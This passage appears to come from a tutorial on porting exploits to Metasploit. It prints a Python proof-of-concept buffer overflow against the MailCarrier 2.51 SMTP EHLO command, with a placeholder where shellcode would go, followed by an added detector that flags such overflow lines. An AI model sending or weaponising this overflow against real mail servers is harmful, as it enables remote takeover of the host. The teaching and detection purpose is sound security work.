Porting Exploits to the Metasploit Framework
But this is an older exploit, originally written for Windows 2000. When you run it now, it doesn’t work quite as you’d expect. Conveniently, a Metasploit module is already in the Framework to implement this exploit, although it could use some improvement. After a little time investigating with varying buffer lengths, you will find that more than 1000 bytes are available for shellcode, and the buffer length needs to be adjusted by 4 bytes. (For more information on how this is accomplished, read “Exploit Writing Tutorial Part 1: Stack Based Overflows,” at http://www.exploit-db.com/download_pdf/13535/.) The new proof of concept for this exploit follows: We have removed the shellcode and replaced the jump instruction with a string (AAAA) to overwrite the EIP register. (Proof of concept exploits contain the basic code necessary to demonstrate the exploit but do not carry an actual payload, and in many cases they require heavy modifications before they will work properly.)
#!/usr/bin/python
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow     #
# Advanced, secure and easy to use Mail Server.         #
#                                                       #
# 23 Oct 2004 - muts                                    #
#########################################################
import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "\n\n###############################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Proof-of-concept buffer: no real payload is carried.
buffer = "\x41" * 5093      # filler up to the saved return address
buffer += "\x42" * 4        # the four bytes that land in EIP
buffer += "\x90" * 32       # NOP sled
buffer += "\xcc" * 1000     # INT3 placeholder where shellcode would go

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.1.155', 25))
    s.send('EHLO ' + buffer + '\r\n')
    data = s.recv(1024)
    s.close()
    print "\nDone!"
except:
    print "Could not connect to SMTP!"
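The layout above (filler, four EIP bytes, NOP sled, INT3 placeholder) is also what a defender would look for on the wire. The following Python 3 check is an added example, not code from the book or from the MailCarrier exploit: it inspects a raw SMTP command line and flags the traits of this PoC, namely a line far beyond the 512-byte limit of RFC 5321, a long run of one repeated byte, and non-printable bytes in the EHLO argument. The MIN_RUN threshold and the sample lines are assumptions constructed for the example.

```python
"""Flag SMTP command lines that look like the EHLO overflow PoC above."""
import re

# RFC 5321 section 4.5.3.1.4: a command line, CRLF included, is at most 512 bytes.
MAX_COMMAND_LINE = 512
# Assumed threshold: a run this long of one byte suggests filler or a NOP sled.
MIN_RUN = 16


def longest_run(data: bytes) -> tuple:
    """Return (byte_value, length) of the longest run of a single repeated byte."""
    best = (None, 0)
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        if len(m.group(0)) > best[1]:
            best = (m.group(1)[0], len(m.group(0)))
    return best


def inspect_smtp_command(line: bytes) -> dict:
    """Inspect one raw SMTP command line as received, CRLF included."""
    stripped = line.rstrip(b"\r\n")
    verb, _, arg = stripped.partition(b" ")
    byte_val, run_len = longest_run(arg)
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    reasons = []
    if len(line) > MAX_COMMAND_LINE:
        reasons.append("line exceeds RFC 5321 512-byte limit")
    if run_len >= MIN_RUN:
        reasons.append("repeated-byte run of %d x 0x%02x" % (run_len, byte_val))
    if non_printable:
        reasons.append("%d non-printable bytes in argument" % non_printable)
    return {
        "verb": verb.upper().decode("ascii", "replace"),
        "arg_len": len(arg),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Constructed samples: a benign greeting and a line laid out like the PoC above.
BENIGN = b"EHLO mail.example.com\r\n"
OVERFLOW = (b"EHLO " + b"\x41" * 5093 + b"\x42" * 4
            + b"\x90" * 32 + b"\xcc" * 1000 + b"\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, OVERFLOW):
        print(inspect_smtp_command(sample))
```

The benign line produces no reasons; the PoC-shaped line trips all three checks, with an argument of 6129 bytes and a 5093-byte run of 0x41.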
As you might imagine, the easiest and fastest way to port a stand-alone
exploit to Metasploit is to modify a similar one from the Framework. And
that’s what we’ll do next.